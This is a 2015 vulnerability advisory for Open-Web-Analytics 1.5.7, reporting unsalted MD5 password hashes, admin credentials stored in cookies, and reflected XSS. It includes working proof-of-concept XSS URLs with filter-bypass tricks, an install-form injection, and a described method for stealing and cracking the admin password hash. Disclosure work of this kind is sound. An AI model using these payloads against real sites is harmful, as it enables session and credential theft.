SecurityvulnsSECURITYVULNS:DOC:32366Open-Web-Analytics-1.5.7 Cryptographic, Password Disclosure & XSS Vulnerabilities
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-OPENWEBANALYTICS0721.txt
Vendor:
Product:
Open-Web-Analytics-1.5.7
Advisory Information:
Cryptographic, Password Disclosure & XSS Vulnerabilities
Vulnerability Details:
Cryptographic Weakness:
Passwords are stored in the database using MD5 hash algorithm
NON salted, we find in owa_lib.php,
public static function encryptPassword($password) {
return md5(strtolower($password).strlen($password));
}
Password Disclosure:
In owa_auth.php on line 329 we find saveCredentials() PHP function which saves the
username & password as browser domain cookie leaving us direct access via XSS attack.
function saveCredentials() {
$this->e->debug('saving user credentials to cookies');
setcookie($this->config['ns'].'u', $this->u->get('user_id'), time()+36002436510, '/', $this->config['cookie_domain']);
setcookie($this->config['ns'].'p', $this->u->get('password'), time()+360024*30, '/', $this->config['cookie_domain']);
}
XSS:
Application is vulnerable to XSS So, now we can access the Admin username & password
credentials from our XSS attack, do a window.open() or whatever and send to a remote server
then come back and login after performing offline crack of the hash. Since we cannot seem
to echo the password using document.cookie we will use window.document['cookie'] to gain
access to admin password. The application uses the admin username and password as persistant browser
cookies which is our dream come true!
e.g. retrieved username & passwd via XSS ( owa_u=admin; owa_p=76ffbb8d470d6a402b3c429f35be8a1a )
user: admin / passwd: abc123
Also a second XSS vector exists in Install PHP script via POST request in the Email address field.
Exploit code(s):
XSS(s) POC:
1- Steal username & password XSS, in this example we inject our malicious payload into the middle of the site ID hash.
http://localhost/Open-Web-Analytics-1.5.7/Open-Web-Analytics-1.5.7/index.php?owa_do=base.sitesInvocation&owa_siteId=e9144cf4%22/%3E%22--%3E%3CDIV%20id=%27HELL%27%20onMouseMove=alert%28window.document[%27cookie%27]%29;%3C!--
Injecting <script> tags seems to be problem, we will defeat that by injecting our own <DIV id='HELL'> tag and call our
JS function using the DOMS onMouseOver() event listener we can also use onMouseMove() etc…
Application seems to filter %20 white space, however we can bypass that using '\x20' raw hex representation.
Finally, to make it execute without interference we need to comment out the rest of the code within the webpage
by inject '<!–' begin comments script right after our evil JS.
vuln param:
owa_siteId
2-http://localhost/Open-Web-Analytics-1.5.7/Open-Web-Analytics-1.5.7/index.php?owa_site_id=&owa_status_code=25%22/%3E%22–%3E%3CDIV%20id=%27hell%27%20onMouseMove=alert%28window.document[%27cookie%27]%29;%3C!–00&owa_do=base.optionsGeneral&
vuln param:
owa_status_code
2- install.php XSS:
http://localhost/Open-Web-Analytics-1.5.7/Open-Web-Analytics-1.5.7/install.php?owa_site_id=&owa_do=base.installDefaultsEntry&
Inject " onMouseOver="alert(666); into Email address field and submit form.
vuln param:
owa_email_address
Disclosure Timeline:
Vendor Notification: July 17, 2015
July 22, 2015 : Public Disclosure
Severity Level:
High
Description:
Request Method(s): [+] GET / POST
Vulnerable Product: [+] Open-Web-Analytics-1.5.7
Vulnerable Parameter(s): [+] owa_siteId, owa_status_code, owa_email_address
Affected Area(s): [+] Admin
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.
(hyp3rlinx)